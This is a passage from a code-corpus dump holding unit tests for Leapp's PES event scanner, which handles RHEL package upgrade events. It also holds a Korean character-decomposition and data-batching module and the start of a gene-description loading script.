'repo', None)},\n              (7, 6), (8, 0), []),\n        Event(2, Action.SPLIT,\n              {Package('sip', 'repo', None)},\n              {Package('python3-pyqt5-sip', 'repo', None), Package('python3-sip', 'repo', None)},\n              (7, 6), (8, 0), [])]\n    installed_pkgs = {('sip', None), ('sip-devel', None)}\n\n    tasks = process_events([(8, 0)], events, installed_pkgs)\n\n    assert tasks[Task.INSTALL] == {('python3-sip-devel', None): 'repo',\n                                   ('python3-pyqt5-sip', None): 'repo',\n                                   ('python3-sip', None): 'repo'}\n    assert tasks[Task.REMOVE] == {('sip-devel', None): 'repo'}\n    assert tasks[Task.KEEP] == {('sip', None): 'repo'}\n\n\n@pytest.mark.parametrize(('source_repoid', 'expected_target_repoid'),\n                         [('rhel7-base-repoid', 'rhel8-crb-repoid'),\n                          ('rhel7-base-repoid-eus', 'rhel8-crb-repoid-eus')])\ndef test_request_pesid_repo_not_mapped_by_default(monkeypatch, source_repoid, expected_target_repoid):\n    \"\"\"\n    Tests whether a target repository that is not mapped by default (e.g. CRB)\n    is requested to be enabled on the target system if it results from the relevant events.\n\n    Note: Since the resulting target repository is not mapped by default from the enabled repositories,\n    the data handler should fail to get expected repoids for the given pesid as it works with enabled\n    repositories. Therefore, this test tests whether the fallback lookup with a representative repository works.\n    \"\"\"\n\n    repositories_mapping = RepositoriesMapping(\n        mapping=[\n            RepoMapEntry(source='rhel7-base', target=['rhel8-BaseOS', 'rhel8-AppStream']),\n            RepoMapEntry(source='rhel7-optional', target=['rhel8-CRB']),\n        ],\n        repositories=[\n            PESIDRepositoryEntry(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid',\n                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n            PESIDRepositoryEntry(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid-eus',\n                                 arch='x86_64', repo_type='rpm', channel='eus', rhui=''),\n            PESIDRepositoryEntry(pesid='rhel7-optional', major_version='7', repoid='rhel7-optional-repoid',\n                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n            PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid',\n                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n            PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-eus',\n                                 arch='x86_64', repo_type='rpm', channel='eus', rhui=''),\n            PESIDRepositoryEntry(pesid='rhel8-AppStream', major_version='8', repoid='rhel8-appstream-repoid',\n                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n            PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid',\n                                 arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n            PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid-eus',\n                                 arch='x86_64', repo_type='rpm', channel='eus', rhui=''),\n        ])\n\n    monkeypatch.setattr(peseventsscanner, '_get_enabled_repoids', lambda: {source_repoid})\n    monkeypatch.setattr(api,\n                        'current_actor',\n                        CurrentActorMocked(msgs=[repositories_mapping], src_ver='7.9', dst_ver='8.4'))\n\n    event = Event(1, Action.MOVED, {Package('test-pkg', 'rhel7-base', None)}, {Package('test-pkg', 'rhel8-CRB', None)},\n                  (7, 9), (8, 0), [])\n    installed_pkgs = {('test-pkg', None)}\n\n    tasks = process_events([(8, 0)], [event], installed_pkgs)\n\n    assert tasks[Task.KEEP] == {('test-pkg', None): expected_target_repoid}\n\n\ndef test_get_repositories_mapping(monkeypatch):\n    \"\"\"\n    Tests whether the actor is able to correctly determine the dictionary that maps the target PES ids\n    determined from the event processing to 
the actual target repository ids\n    (tests the _get_repositories_mapping function).\n    \"\"\"\n\n    make_pesid_repo = functools.partial(PESIDRepositoryEntry, arch='x86_64', repo_type='rpm', channel='ga', rhui='')\n    repositories_mapping = RepositoriesMapping(\n        mapping=[\n            RepoMapEntry(source='rhel7-base', target=['rhel8-BaseOS', 'rhel8-AppStream']),\n            RepoMapEntry(source='rhel7-optional', target=['rhel8-CRB']),\n        ],\n        repositories=[\n            make_pesid_repo(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid'),\n            make_pesid_repo(pesid='rhel7-optional', major_version='7', repoid='rhel7-optional-repoid'),\n            make_pesid_repo(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid'),\n            make_pesid_repo(pesid='rhel8-AppStream', major_version='8', repoid='rhel8-appstream-repoid'),\n            make_pesid_repo(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid'),\n            # Extra repositories to make sure the created map contains the correct repoids\n            PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid-azure',\n                                 arch='x86_64', repo_type='rpm', channel='ga', rhui='azure'),\n            PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-eus',\n                                 arch='x86_64', repo_type='rpm', channel='eus', rhui=''),\n            PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-s390x',\n                                 arch='s390x', repo_type='rpm', channel='ga', rhui=''),\n        ])\n\n    monkeypatch.setattr(peseventsscanner, '_get_enabled_repoids', lambda: {'rhel7-base-repoid'})\n    monkeypatch.setattr(api,\n                        'current_actor',\n                        CurrentActorMocked(msgs=[repositories_mapping], src_ver='7.9', dst_ver='8.4'))\n\n    target_pesids = {'rhel8-BaseOS', 'rhel8-AppStream', 'rhel8-CRB'}\n    expected_pesid_to_target_repoids = {\n        'rhel8-BaseOS': 'rhel8-baseos-repoid',\n        'rhel8-AppStream': 'rhel8-appstream-repoid',\n        'rhel8-CRB': 'rhel8-crb-repoid'\n    }\n\n    actual_pesid_to_target_repoids = peseventsscanner._get_repositories_mapping(target_pesids)\n\n    fail_description = 'Actor failed to determine what repoid to enable for given target pesids.'\n    assert actual_pesid_to_target_repoids == expected_pesid_to_target_repoids, fail_description\n\n\ndef test_pesid_to_target_repoids_translation(monkeypatch, caplog):\n    \"\"\"\n    Tests whether the actor is able to correctly translate target pesids resulting\n    from event processing when it is supplied with a valid dictionary that maps pesids to target repoids.\n    \"\"\"\n    monkeypatch.setattr(api, 'show_message', show_message_mocked())\n    monkeypatch.setattr(peseventsscanner, '_get_repositories_mapping', lambda dummy_target_pesids: {'repo': 'mapped'})\n    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n    monkeypatch.setenv('LEAPP_VERBOSE', '1')\n\n    to_install = {\n        ('pkg01', None): 'repo',\n        ('pkg02', ('module', 'stream')): 'repo',\n        ('skipped01', None): 'not_mapped',\n        ('skipped02', ('module', 'stream')): 'not_mapped'}\n    map_repositories(to_install)\n\n    msg = (\n        '2 packages may not be installed or upgraded due to repositories unknown to leapp:\\n'\n        '- skipped01 (repoid: not_mapped)\\n'\n        '- skipped02 [module:stream] (repoid: not_mapped)'\n    )\n    assert msg in caplog.messages\n    assert reporting.create_report.called == 1\n    assert reporting.create_report.report_fields['title'] == (\n        'Packages from unknown repositories may not be installed'\n    )\n    assert reporting.create_report.report_fields['summary'] == msg\n\n    assert to_install == {('pkg01', None): 'mapped', ('pkg02', ('module', 'stream')): 'mapped'}\n\n\ndef 
test_process_events(monkeypatch):\n    \"\"\"\n    Verifies that the event processing algorithm works as expected.\n    \"\"\"\n    monkeypatch.setattr(peseventsscanner,\n                        '_get_repositories_mapping',\n                        lambda dummy_target_pesids: {'rhel8-repo': 'rhel8-mapped'})\n    monkeypatch.setattr(peseventsscanner, 'get_repositories_blacklisted', get_repos_blacklisted_mocked(set()))\n\n    events = [\n        Event(1, Action.SPLIT,\n              {Package('original', 'rhel7-repo', None)},\n              {Package('split01', 'rhel8-repo', None), Package('split02', 'rhel8-repo', None)},\n              (7, 6), (8, 0), []),\n        Event(2, Action.REMOVED,\n              {Package('removed', 'rhel7-repo', None)}, set(),\n              (7, 6), (8, 0), []),\n        Event(3, Action.PRESENT,\n              {Package('present', 'rhel8-repo', None)}, set(),\n              (7, 6), (8, 0), []),\n        # this package is present at the start, gets removed and then reintroduced\n        Event(4, Action.REMOVED,\n              {Package('reintroduced', 'rhel7-repo', None)}, set(),\n              (7, 6), (8, 0), []),\n        Event(5, Action.PRESENT,\n              {Package('reintroduced', 'rhel8-repo', None)}, set(),\n              (8, 0), (8, 1), []),\n        # however, this package was never there\n        Event(6, Action.REMOVED,\n              {Package('neverthere', 'rhel7-repo', None)}, set(),\n              (7, 6), (8, 0), []),\n        Event(7, Action.PRESENT,\n              {Package('neverthere', 'rhel8-repo', None)}, set(),\n              (8, 0), (8, 1), [])]\n    installed_pkgs = {('original', None), ('removed', None), ('present', None), ('reintroduced', None)}\n    tasks = process_events([(8, 0), (8, 1)], events, installed_pkgs)\n\n    assert tasks[Task.INSTALL] == {('split02', None): 'rhel8-mapped', ('split01', None): 'rhel8-mapped'}\n    assert tasks[Task.REMOVE] == {('removed', None): 'rhel7-repo', ('original', None): 'rhel7-repo'}\n    assert tasks[Task.KEEP] == {('present', None): 'rhel8-mapped', ('reintroduced', None): 'rhel8-mapped'}\n\n\ndef test_get_events(monkeypatch):\n    \"\"\"\n    Verifies that the actor gracefully handles errors raised when unable to load events from a file\n    and inhibits the upgrade in such a case.\n    \"\"\"\n    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked())\n\n    with pytest.raises(StopActorExecution):\n        get_events(os.path.join(CUR_DIR, 'files'), 'sample02.json')\n    assert reporting.create_report.called == 1\n    assert 'inhibitor' in reporting.create_report.report_fields['flags']\n\n    reporting.create_report.called = 0\n    reporting.create_report.model_instances = []\n    with pytest.raises(StopActorExecution):\n        get_events(os.path.join(CUR_DIR, 'files'), 'sample03.json')\n    assert reporting.create_report.called == 1\n    assert 'inhibitor' in reporting.create_report.report_fields['flags']\n\n\ndef test_pes_data_not_found(monkeypatch):\n    def read_or_fetch_mocked(filename, directory=\"/etc/leapp/files\", service=None, allow_empty=False):\n        fetch._raise_error('pes-data.json', 'epic fail!')\n\n    monkeypatch.setattr(fetch, 'read_or_fetch', read_or_fetch_mocked)\n    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked())\n    with pytest.raises(StopActorExecutionError):\n        get_events('/etc/leapp', 'pes-data.json')\n\n\ndef test_add_output_pkgs_to_transaction_conf():\n    \"\"\"\n    Verifies that the add_output_pkgs_to_transaction_conf correctly modifies the to_remove field based\n    on the supplied events.\n    \"\"\"\n    events = [\n        Event(1, Action.SPLIT,\n              {Package('split_in', 'repo', None)},\n              {Package('split_out1', 'repo', None), Package('split_out2', 'repo', None)},\n              (7, 6), (8, 0), []),\n        Event(2, Action.MERGED,\n              
{Package('merge_in1', 'repo', None), Package('merge_in2', 'repo', None)},\n {Package('merge_out', 'repo', None)},\n (7, 6), (8, 0), []),\n Event(3, Action.RENAMED,\n {Package('renamed_in', 'repo', None)},\n {Package('renamed_out', 'repo', None)},\n (7, 6), (8, 0), []),\n Event(4, Action.REPLACED,\n {Package('replaced_in', 'repo', None)},\n {Package('replaced_out', 'repo', None)},\n (7, 6), (8, 0), []),\n ]\n\n conf_empty = RpmTransactionTasks()\n add_output_pkgs_to_transaction_conf(conf_empty, events)\n assert conf_empty.to_remove == []\n\n conf_split = RpmTransactionTasks(to_remove=['split_in'])\n add_output_pkgs_to_transaction_conf(conf_split, events)\n assert sorted(conf_split.to_remove) == ['split_in', 'split_out1', 'split_out2']\n\n conf_merged_incomplete = RpmTransactionTasks(to_remove=['merge_in1'])\n add_output_pkgs_to_transaction_conf(conf_merged_incomplete, events)\n assert conf_merged_incomplete.to_remove == ['merge_in1']\n\n conf_merged = RpmTransactionTasks(to_remove=['merge_in1', 'merge_in2'])\n add_output_pkgs_to_transaction_conf(conf_merged, events)\n assert sorted(conf_merged.to_remove) == ['merge_in1', 'merge_in2', 'merge_out']\n\n conf_renamed = RpmTransactionTasks(to_remove=['renamed_in'])\n add_output_pkgs_to_transaction_conf(conf_renamed, events)\n assert sorted(conf_renamed.to_remove) == ['renamed_in', 'renamed_out']\n\n conf_replaced = RpmTransactionTasks(to_remove=['replaced_in'])\n add_output_pkgs_to_transaction_conf(conf_replaced, events)\n assert sorted(conf_replaced.to_remove) == ['replaced_in', 'replaced_out']\n\n\ndef test_filter_events_by_architecture():\n \"\"\"\n Verifies that the packages are correctly filtered based on the architecture.\n \"\"\"\n events = [\n Event(1, Action.PRESENT, {Package('pkg1', 'repo', None)}, set(), (7, 6), (8, 0), ['arch1']),\n Event(2, Action.PRESENT, {Package('pkg2', 'repo', None)}, set(), (7, 6), (8, 0), ['arch2', 'arch1', 'arch3']),\n Event(3, Action.PRESENT, {Package('pkg3', 'repo', None)}, set(), (7, 6), (8, 0), ['arch2', 'arch3', 'arch4']),\n Event(4, Action.PRESENT, {Package('pkg4', 'repo', None)}, set(), (7, 6), (8, 0), [])\n ]\n\n filtered = filter_events_by_architecture(events, 'arch1')\n assert {Package('pkg1', 'repo', None)} in [event.in_pkgs for event in filtered]\n assert {Package('pkg2', 'repo', None)} in [event.in_pkgs for event in filtered]\n assert {Package('pkg3', 'repo', None)} not in [event.in_pkgs for event in filtered]\n assert {Package('pkg4', 'repo', None)} in [event.in_pkgs for event in filtered]\n\n\ndef test_filter_events_by_releases():\n \"\"\"\n Tests whether the events are correctly filtered based on the relevant supplied releases.\n \"\"\"\n events = [\n Event(1, Action.PRESENT, {Package('pkg1', 'repo', None)}, set(), (7, 6), (7, 7), []),\n Event(2, Action.PRESENT, {Package('pkg2', 'repo', None)}, set(), (7, 7), (7, 8), []),\n Event(3, Action.PRESENT, {Package('pkg3', 'repo', None)}, set(), (7, 8), (8, 0), []),\n Event(4, Action.PRESENT, {Package('pkg4', 'repo', None)}, set(), (8, 0), (8, 1), []),\n Event(5, Action.PRESENT, {Package('pkg5', 'repo', None)}, set(), (8, 1), (8, 2), [])\n ]\n\n filtered = filter_events_by_releases(events, [(7, 6), (7, 7), (8, 0), (8, 3)])\n assert {Package('pkg1', 'repo', None)} in [event.in_pkgs for event in filtered]\n assert {Package('pkg2', 'repo', None)} not in [event.in_pkgs for event in filtered]\n assert {Package('pkg3', 'repo', None)} in [event.in_pkgs for event in filtered]\n assert {Package('pkg4', 'repo', None)} not in [event.in_pkgs for event in 
filtered]\n    assert {Package('pkg5', 'repo', None)} not in [event.in_pkgs for event in filtered]\n\n\n@pytest.mark.parametrize(('src_version', 'dst_version', 'expected_releases'),\n                         [('7.9', '8.6', [(8, 0), (8, 1), (8, 2), (8, 3), (8, 4), (8, 5), (8, 6)]),\n                          ('8.6', '9.0', [(9, 0)])])\ndef test_filter_irrelevant_releases(monkeypatch, src_version, dst_version, expected_releases):\n    \"\"\"\n    Tests that all releases that happened before the source version or after the target version are filtered out.\n    \"\"\"\n\n    monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(src_ver=src_version, dst_ver=dst_version))\n    releases = [\n        (7, 6), (7, 7), (7, 8), (7, 9), (8, 0), (8, 1), (8, 2), (8, 3), (8, 4), (8, 5), (8, 6), (9, 0), (9, 1)\n    ]\n    filtered_releases = filter_irrelevant_releases(releases)\n    assert filtered_releases == expected_releases\n\n\ndef test_drop_conflicting_release_events():\n    \"\"\"\n    Tests whether correct events are dropped from conflicting release events.\n    From conflicting events only the one with the highest target release should be kept.\n    \"\"\"\n\n    conflict1a = Event(1, Action.PRESENT, {Package('pkg1', 'repo', None)}, set(), (7, 6), (8, 0), [])\n    conflict1b = Event(2, Action.REPLACED, {Package('pkg1', 'repo', None)}, set(), (7, 6), (8, 2), [])\n    conflict1c = Event(3, Action.REMOVED, {Package('pkg1', 'repo', None)}, set(), (7, 6), (8, 1), [])\n    conflict2a = Event(4, Action.REMOVED, {Package('pkg2a', 'repo', None)}, set(), (7, 6), (8, 0), [])\n    conflict2b = Event(5, Action.REPLACED,\n                       {Package('pkg2a', 'repo', None)}, {Package('pkg2b', 'repo', None)},\n                       (7, 6), (8, 1), [])\n    # two input packages\n    conflict3a = Event(6, Action.MERGED,\n                       {Package('pkg3a', 'repo', None), Package('pkg3b', 'repo', None)},\n                       {Package('pkg3c', 'repo', None)},\n                       (7, 6), (8, 0), [])\n    conflict3b = Event(7, Action.MERGED,\n                       {Package('pkg3a', 'repo', None), Package('pkg3b', 'repo', None)},\n                       {Package('pkg3d', 'repo', None)},\n                       (7, 6), (8, 1), [])\n    # these two can't be chained, don't remove anything\n    okay1a = Event(8, Action.REPLACED,\n                   {Package('pkg4a', 'repo', None)}, {Package('pkg4b', 'repo', None)},\n                   (7, 6), (8, 0), [])\n    okay1b = Event(9, Action.REPLACED,\n                   {Package('pkg4b', 'repo', None)}, {Package('pkg4c', 'repo', None)},\n                   (8, 0), (8, 1), [])\n\n    events = [conflict1a, conflict1b, conflict1c, conflict2a, conflict2b, conflict3a, conflict3b, okay1a, okay1b]\n    drop_conflicting_release_events(events)\n\n    for event in [conflict1b, conflict2b, conflict3b, okay1a, okay1b]:\n        assert event in events\n    for event in [conflict1a, conflict1c, conflict2a, conflict3a]:\n        assert event not in events\n\n\ndef test_process_modular_events(monkeypatch):\n    monkeypatch.setattr(peseventsscanner, 'map_repositories', lambda x: x)\n    monkeypatch.setattr(peseventsscanner, 'filter_out_pkgs_in_blacklisted_repos', lambda x: x)\n\n    events = [\n        # match the right modular package without touching the ones with absent or different module/stream\n        # in practice, installed packages can't have the same name, just testing that it matches the right one\n        Event(1, Action.REMOVED, {Package('removed', 'repo', ('module', '42'))}, set(), (8, 4), (9, 0), []),\n        Event(2, Action.SPLIT,\n              {Package('split_in', 'repo', ('splitin', 'foo'))},\n              {Package('split_out1', 'repo', None), Package('split_out2', 'repo', ('splitout', 'foo'))},\n              (8, 4), (9, 0), []),\n        Event(3, Action.SPLIT,\n              {Package('split_in', 'repo', ('splitin', 'bar'))},\n              {Package('split_out3', 'repo', None), Package('split_out2', 'repo', ('splitout', 'bar'))},\n              (8, 4), (9, 0), []),\n    ]\n    
installed_pkgs = {('removed', ('module', '42')),\n                      ('removed', ('model', '42')),\n                      ('removed', ('module', '420')),\n                      ('removed', None),\n                      ('split_in', ('splitin', 'foo'))}\n\n    tasks = process_events([(9, 0)], events, installed_pkgs)\n\n    assert ('removed', ('module', '42')) in tasks[Task.REMOVE]  # name, module and stream match\n    assert ('removed', ('model', '42')) not in tasks[Task.REMOVE]  # different module\n    assert ('removed', ('module', '420')) not in tasks[Task.REMOVE]  # different stream\n    assert ('removed', None) not in tasks[Task.REMOVE]  # no module stream\n\n    assert ('split_in', ('splitin', 'foo')) in tasks[Task.REMOVE]\n    assert ('split_out1', None) in tasks[Task.INSTALL]\n    assert ('split_out2', ('splitout', 'foo')) in tasks[Task.INSTALL]\n    assert ('split_in', ('splitin', 'bar')) not in tasks[Task.REMOVE]\n    assert ('split_out3', None) not in tasks[Task.INSTALL]\n    assert ('split_out2', ('splitout', 'bar')) not in tasks[Task.INSTALL]\n\n\n@pytest.mark.parametrize(('installed_pkgs', 'expected_relevance'),\n                         [({('pkg1', None), ('pkg2', None)}, True),\n                          ({('pkg2', None)}, True),\n                          ({('pkg0', None)}, True),\n                          ({('pkg1', 'wuzza:11')}, True),\n                          ({('pkg2', 'wuzza:11')}, True),\n                          ({('pkg1', 'wuzza:11'), ('pkg2', 'wuzza:11')}, True),\n                          ({('pkg0', 'wuzza:11')}, False),\n                          (set(), False)])\ndef test_merge_events_relevance_assessment(monkeypatch, installed_pkgs, expected_relevance):\n    \"\"\"\n    Verifies that the relevance of the MERGED events is correctly assessed when processing events.\n    \"\"\"\n    monkeypatch.setattr(peseventsscanner, 'map_repositories', lambda x: x)\n    monkeypatch.setattr(peseventsscanner, 'filter_out_pkgs_in_blacklisted_repos', lambda x: x)\n\n    events = [\n        Event(\n            1, Action.REPLACED,\n            {Package('pkg0', 'repo-in', None)},\n            {Package('pkg4', 'repo-out', None)},\n            (7, 8), (7, 9), []\n        ),\n        Event(\n            2, Action.MERGED,\n            {Package('pkg1', 'repo-in', None), Package('pkg2', 'repo-in', None)},\n            {Package('pkg3', 'repo-out', None)},\n            (7, 9), (8, 0), [],\n        ),\n        Event(\n            3, Action.MERGED,\n            {Package('pkg1', 'repo-in', 'wuzza:11'), Package('pkg2', 'repo-in', 'wuzza:11')},\n            {Package('pkg3', 'repo-out', None)},\n            (7, 9), (8, 0), [],\n        )\n    ]\n\n    tasks = process_events([(7, 9), (8, 0)], events, installed_pkgs)\n\n    if expected_relevance:\n        assert not set(tasks[Task.INSTALL].keys()) - {('pkg3', None), ('pkg4', None)}\n        removed_packages = set()\n        if any(p[1] for p in installed_pkgs):\n            removed_packages = installed_pkgs\n        if ('pkg0', None) in installed_pkgs:\n            removed_packages.add(('pkg0', None))\n        if ('pkg1', None) in installed_pkgs or ('pkg2', None) in installed_pkgs:\n            removed_packages.add(('pkg1', None))\n            removed_packages.add(('pkg2', None))\n\n        assert not set(tasks[Task.REMOVE].keys()) - removed_packages\n    else:\n        assert not tasks[Task.INSTALL]\n        assert not tasks[Task.REMOVE]\n","sub_path":"repos/system_upgrade/common/actors/peseventsscanner/tests/unit_test_peseventsscanner.py","file_name":"unit_test_peseventsscanner.py","file_ext":"py","file_size_in_byte":34269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"336861220","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom config import get_config\n\nimport numpy as np\n\n\n__AUTHOR__ = \"kozistr\"\n__VERSION__ = \"0.1\"\n\ncfg, _ = get_config()  # configuration\n\n# set random seed\nnp.random.seed(cfg.seed)\n\n\nclass Char2VecEmbeddings:\n    \"\"\"\n    Copyright 2018 NAVER Corp.\n    Permission is hereby granted, free of charge, to any 
person obtaining a copy of this software and\n associated documentation files (the \"Software\"), to deal in the Software without restriction, including\n without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to\n the following conditions:\n The above copyright notice and this permission notice shall be included in all copies or substantial\n portions of the Software.\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\n INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\n CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE\n OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n \"\"\"\n\n def __init__(self):\n self.cho = \"ㄱㄲㄴㄷㄸㄹㅁㅂㅃㅅㅆㅇㅈㅉㅊㅋㅌㅍㅎ\" # len = 19\n self.jung = \"ㅏㅐㅑㅒㅓㅔㅕㅖㅗㅘㅙㅚㅛㅜㅝㅞㅟㅠㅡㅢㅣ\" # len = 21\n self.jong = \"ㄱ/ㄲ/ㄱㅅ/ㄴ/ㄴㅈ/ㄴㅎ/ㄷ/ㄹ/ㄹㄱ/ㄹㅁ/ㄹㅂ/ㄹㅅ/ㄹㅌ/ㄹㅍ/ㄹㅎ/ㅁ/ㅂ/ㅂㅅ/ㅅ/ㅆ/ㅇ/ㅈ/ㅊ/ㅋ/ㅌ/ㅍ/ㅎ\".\\\n split('/') # len = 27\n self.kor_chars = self.cho + self.jung + ''.join(self.jong)\n\n self.len_jung = len(self.jung)\n self.len_jong = len(self.jong) + 1\n self.hangul_length = len(self.kor_chars)\n\n def is_valid_char(self, x):\n return x in self.kor_chars\n\n def decompose(self, x, warning=True):\n in_char = x\n if x < ord('가') or x > ord('힣'): # not korean char\n return chr(x)\n\n x -= ord('가')\n y = x // self.len_jong\n z = x % self.len_jong\n x = y // self.len_jung\n y = y % self.len_jung\n\n zz = self.jong[z - 1] if z > 0 else ''\n if x >= len(self.cho):\n if warning:\n print(\"[-] Unknown Exception : \", in_char, chr(in_char), x, y, z, zz)\n return self.cho[x] + self.jung[y] + zz\n\n def decompose_str(self, string, warning=True):\n return ''.join([self.decompose(ord(x), warning=warning) for x in string])\n\n def decompose_as_one_hot(self, in_char, warning=True):\n # print(ord('ㅣ'), chr(0xac00))\n # [0, 66]: hangul / [67, 194]: ASCII / [195, 245]: hangul danja, danmo / [246, 249]: special characters\n # Total 250 dimensions.\n\n one_hot = []\n\n if ord('가') <= in_char <= ord('힣'): # 가:44032 , 힣: 55203\n x = in_char - ord('가')\n y = x // self.len_jong\n z = x % self.len_jong\n x = y // self.len_jung\n y = y % self.len_jung\n\n zz = self.jong[z - 1] if z > 0 else ''\n if x >= len(self.cho):\n if warning:\n print(\"[-] Unknown Exception : \", in_char, chr(in_char), x, y, z, zz)\n\n one_hot.append(x)\n one_hot.append(len(self.cho) + y)\n if z > 0:\n one_hot.append(len(self.cho) + len(self.jung) + (z - 1))\n return one_hot\n else:\n if in_char < 128:\n return [self.hangul_length + in_char] # 67 ~\n elif ord('ㄱ') <= in_char <= ord('ㅣ'):\n return [self.hangul_length + 128 + (in_char - 12593)] # 194 ~ # [ㄱ:12593] ~ [ㅣ:12643] (len = 51)\n elif in_char == ord('♡'):\n return [self.hangul_length + 128 + 51] # 245 ~ # ♡\n elif in_char == ord('♥'):\n return [self.hangul_length + 128 + 51 + 1] # ♥\n elif in_char == ord('★'):\n return [self.hangul_length + 128 + 51 + 2] # ★\n elif in_char == ord('☆'):\n return [self.hangul_length + 128 + 51 + 3] # ☆\n else:\n if warning:\n print(\"[-] Unhandled character : \", chr(in_char), in_char)\n return []\n\n def decompose_str_as_one_hot(self, string, warning=True):\n tmp_list = []\n for x in string:\n tmp_list.extend(self.decompose_as_one_hot(ord(x), 
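The decomposition arithmetic in `decompose()` and `decompose_as_one_hot()` is easier to see on a concrete syllable. A standalone sketch of the same mixed-radix index math (28 = number of jongseong slots including "no final consonant", 21 = number of jungseong), checked against '한' = 'ㅎ' + 'ㅏ' + 'ㄴ':

```python
# Worked example of the syllable arithmetic used above: a Hangul syllable's
# code point encodes (cho, jung, jong) in mixed radix starting at ord('가').
CHO = "ㄱㄲㄴㄷㄸㄹㅁㅂㅃㅅㅆㅇㅈㅉㅊㅋㅌㅍㅎ"          # 19 initial consonants
JUNG = "ㅏㅐㅑㅒㅓㅔㅕㅖㅗㅘㅙㅚㅛㅜㅝㅞㅟㅠㅡㅢㅣ"      # 21 vowels
JONG = "ㄱ/ㄲ/ㄱㅅ/ㄴ/ㄴㅈ/ㄴㅎ/ㄷ/ㄹ/ㄹㄱ/ㄹㅁ/ㄹㅂ/ㄹㅅ/ㄹㅌ/ㄹㅍ/ㄹㅎ/ㅁ/ㅂ/ㅂㅅ/ㅅ/ㅆ/ㅇ/ㅈ/ㅊ/ㅋ/ㅌ/ㅍ/ㅎ".split('/')

x = ord('한') - ord('가')   # 54620 - 44032 = 10588
jong = x % 28               # 28 = len(JONG) + 1 (the "no final consonant" slot)
jung = (x // 28) % 21
cho = x // 28 // 21

assert CHO[cho] == 'ㅎ' and JUNG[jung] == 'ㅏ' and JONG[jong - 1] == 'ㄴ'
```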
warning=warning))\n return tmp_list\n\n def __str__(self):\n return \"Char2Vec\"\n\n\nclass DataIterator:\n\n def __init__(self, text, text_len, mel, mag, batch_size):\n \"\"\" DataLoader\n :param text: A NumPy array. Text data.\n :param text_len: A NumPy array. Text length data.\n :param mel: A NumPy array. mel-spectrogram data.\n :param mag: A NumPy array. magnitude data.\n :param batch_size: An int. Batch size.\n \"\"\"\n self.text = text\n self.text_len = text_len\n self.mel = mel\n self.mag = mag\n self.batch_size = batch_size\n\n self.num_examples = num_examples = text.shape[0]\n self.num_batches = num_examples // batch_size\n self.pointer = 0\n\n assert (self.batch_size <= self.num_examples)\n\n def next_batch(self):\n start = self.pointer\n self.pointer += self.batch_size\n\n if self.pointer > self.num_examples:\n perm = np.arange(self.num_examples)\n np.random.shuffle(perm)\n\n self.text = self.text[perm]\n self.text_len = self.text_len[perm]\n self.mel = self.mel[perm]\n self.mag = self.mag[perm]\n\n start = 0\n self.pointer = self.batch_size\n\n end = self.pointer\n\n return self.text[start:end], self.text_len[start:end], self.mel[start:end], self.mag[start:end]\n\n def iterate(self):\n for step in range(self.num_batches):\n yield self.next_batch()\n","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"584563552","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndef loadData(GenDescription):\r\n \"\"\"\r\n The Python code and txt files must be located in this directory.\r\n Loads the data needed for phase 3, the description of the genes.\r\n Input: text file GenDescription\r\n Output: Dictionary\r\n \"\"\"\r\n #read the txt files\r\n infileGen = open(GenDescription)\r\n lines = infileGen.read().splitlines()\r\n infileGen.close()\r\n \r\n locsID=list(range(0,len(lines),3)) #list of keys positions\r\n IDsGen=[]\r\n for locID in locsID:\r\n #add ID's to list\r\n ID=lines[locID]\r\n IDsGen.append(ID)\r\n \r\n locsDescription=list(range(1,len(lines),3)) #list of values positions\r\n descriptionGen=[]\r\n for locDescription in locsDescription:\r\n #add descriptions to list\r\n description=lines[locDescription]\r\n descriptionGen.append(description)\r\n \r\n dictGenDes = {}\r\n for ID in IDsGen:\r\n dictGenDes[ID]=descriptionGen[IDsGen.index(ID)]\r\n \r\n return dictGenDes\r\nloadData('GenDescription2.txt')\r\n\r\ndef resultladen(tekstbestand):\r\n 